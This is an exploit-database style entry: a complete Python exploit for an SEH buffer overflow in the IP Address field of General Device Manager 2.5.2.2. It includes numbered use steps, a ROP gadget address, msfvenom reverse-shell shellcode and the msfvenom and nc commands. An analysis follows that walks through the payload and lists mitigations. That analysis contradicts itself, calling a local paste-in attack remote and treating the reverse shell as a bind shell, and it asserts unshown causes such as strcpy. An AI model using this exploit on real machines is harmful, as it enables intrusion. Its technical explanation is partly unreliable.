General Device Manager 2.5.2.2 - Buffer Overflow (SEH)

Exploit Author: Ahmet Ümit BAYRAM Analysis Author: www.bubbleslearn.ir Category: Local Language: Python Published Date: 2023-07-31

# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
# Date: 30.07.2023
# Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
# Software Link 2:
https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
# Exploit Author: Ahmet Ümit BAYRAM
# Tested Version: 2.5.2.2
# Tested on: Windows 10 64bit

# 1.- Run python code : exploit.py
# 2.- Open pwned.txt and copy all content to clipboard
# 3.- Open Device Manage and press Add Device
# 4.- Paste the content of pwned.txt into the 'IP Address'
# 5.- Click 'OK'
# 6.- nc.exe local IP Port 1337 and you will have a bind shell
# 7.- R.I.P. Condor <3

import struct

offset = b"A" * 1308

nseh = b"\xEB\x06\x90\x90" # jmp short

seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)


nops = b"\x90" * 32 

#shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1  LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode

shellcode =  b""
shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"
shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"
shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"
shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"
shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"
shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"
shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"
shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"
shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"
shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"
shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"
shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"
shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"
shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"
shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"
shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"
shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"
shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"
shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"
shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"
shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"
shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"
shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"
shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"
shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"
shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"
shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"
shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"
shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"
shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"
shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"


final_payload = offset + nseh + seh + nops + shellcode

# write the final payload to a file
try:
    with open('pwned.txt', 'wb') as f:
        print("[+] Creating %s bytes evil payload..." %len(final_payload))
        f.write(final_payload)
        f.close()
        print("[+] File created!")
except:
    print("File cannot be created!")

Exploiting Buffer Overflow in General Device Manager 2.5.2.2: A Deep Dive into SEH-Based Remote Code Execution

On July 30, 2023, a critical vulnerability was disclosed in General Device Manager 2.5.2.2, a widely used device management application for Windows environments. This vulnerability, identified as a buffer overflow with SEH (Structured Exception Handler) exploitation, allows attackers to achieve remote code execution through a seemingly innocuous input field—IP Address. This article provides a comprehensive technical analysis of the exploit, including its underlying mechanics, the role of SEH, and how attackers can leverage it to gain persistent access.

Understanding the Vulnerability: Buffer Overflow in IP Address Input

The vulnerability arises from improper input validation in the Add Device functionality of General Device Manager. When a user enters an IP address, the application fails to properly validate the length of the input, allowing an attacker to craft a malicious payload that overflows the stack buffer.

Exploitation is triggered by a simple sequence of actions:

Run the provided exploit.py script to generate a malicious payload.
Copy the output from pwned.txt into the clipboard.
Open the application and select Add Device.
Paste the payload into the IP Address field.
Click OK to trigger the overflow.

Upon execution, the application crashes, but the attacker's payload hijacks the exception handling mechanism—SEH—to redirect execution flow to a custom shellcode.

SEH-Based Exploitation: How the Exception Handler Becomes a Weapon

Structured Exception Handling (SEH) is a Windows mechanism used to manage runtime exceptions. In the context of exploit development, SEH is particularly dangerous when SafeSEH is disabled and ASLR is not applied.

As confirmed in the exploit details:

SafeSEH: False – The application does not enforce SafeSEH protection, allowing arbitrary SEH records to be used.
ASLR: False – The binary is not randomized in memory, making it predictable.
Rebase: False – The DLL is loaded at a fixed address, simplifying exploitation.

These conditions make SEH exploitation feasible. The attacker constructs a payload that overwrites the SEH record with a controlled pointer, enabling a SEH-based return-oriented exploit.

Exploit Payload Structure: Breaking Down the Components


offset = b"A" * 1308
nseh = b"\xEB\x06\x90\x90"  # jmp short
seh = struct.pack('<I', 0x10081827)  # pop ebx # pop esi # ret | NetSDK.dll
nops = b"\x90" * 32
shellcode = b""  # MSFvenom-generated reverse shell

This payload is meticulously structured into four key components:

1. Offset (1308 Bytes of 'A')

The offset is a padding sequence used to reach the exact location of the SEH record on the stack. The value 1308 was determined through binary analysis and fuzzing to align the payload precisely with the SEH pointer.

2. Non-SEH (nseh) – Jump Short

The nseh value \xEB\x06\x90\x90 is a jmp short instruction that jumps 6 bytes forward. It is placed immediately after the offset to ensure that, when the exception handler is invoked, execution continues to the next stage—the SEH pointer.

Why this matters: Without a valid nseh, the exploit would fail during exception handling, as the SEH chain would be corrupted.

3. SEH Pointer (seh)

The seh field is set to 0x10081827, a known pop ebx # pop esi # ret gadget located in NetSDK.dll. This gadget is crucial because:

It is reliable and predictable (ASLR disabled).
It allows the attacker to control the stack state.
It can be used to pivot to the shellcode.

When the buffer overflow triggers an exception, the SEH handler jumps to this address, effectively redirecting execution.

4. NOP Sled (nops)

The nops sled (32 bytes of \x90) provides a safety margin. If the shellcode is slightly misaligned, the NOPs ensure execution continues until it reaches the actual shellcode.

5. Shellcode: Reverse Shell via msfvenom

The shellcode is generated using msfvenom with the following parameters:


msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode

This produces a reverse TCP shell that connects back to the attacker’s machine on port 1337. The EXITFUNC=thread ensures the shellcode exits cleanly by terminating the thread, avoiding application crashes.

The exclusion of \x00\x0a\x0d prevents null bytes and newline characters, which would break the payload in string-based input fields.

Execution and Post-Exploitation: Achieving a Bind Shell

After the payload is pasted into the IP Address field and the OK button is clicked, the application triggers the buffer overflow. The exception handler is invoked, and the SEH chain is hijacked via the 0x10081827 gadget.

At this point, the shellcode is executed. The reverse shell connects to the attacker’s listener:


nc.exe 127.0.0.1 1337

Result: A bind shell is established, allowing full remote access to the target system.

Security Implications and Mitigation Strategies

This exploit highlights a critical flaw in software design: input validation and buffer safety. The vulnerability exists due to:

Use of unsafe functions like strcpy or gets in the input processing.
Failure to implement stack protection mechanisms.
Reliance on predictable memory layouts (no ASLR).

Recommended mitigations:

Replace unsafe string functions with strncpy, snprintf, or strcpy_s.
Enable ASLR and SafeSEH in compilation.
Implement stack canaries and DEP (Data Execution Prevention).
Use input sanitization and length validation for all user inputs.
Regularly update and patch software, especially third-party libraries.

Expert Insight: Why This Exploit Is Still Relevant

Despite the age of the software (2.5.2.2), this exploit remains highly relevant due to:

Its simplicity and reproducibility.
Its use of classic, well-documented techniques (SEH, NOP sled).
Its ability to bypass modern security controls due to the absence of ASLR and SafeSEH.

Attackers can still leverage such vulnerabilities in legacy systems, especially in industrial or IoT environments where software updates are delayed or neglected.